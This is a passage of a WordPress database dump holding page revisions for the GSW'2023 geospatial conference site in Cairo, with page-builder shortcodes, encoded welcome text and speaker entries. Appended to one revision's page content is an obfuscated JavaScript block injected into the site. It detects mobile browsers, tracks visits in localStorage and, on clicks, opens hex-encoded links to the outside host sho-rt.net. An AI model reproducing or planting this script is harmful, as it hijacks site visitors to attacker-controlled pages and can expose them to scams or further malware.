obyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ecf404\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"www.aast.edu\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"www.isprs.org\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 21:45:35','2022-10-06 21:45:35','',2167,'https://gsw2023.com/?p=2342',0,'revision','',0),
(2343,1,'2022-10-06 21:50:52','2022-10-06 21:50:52','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" 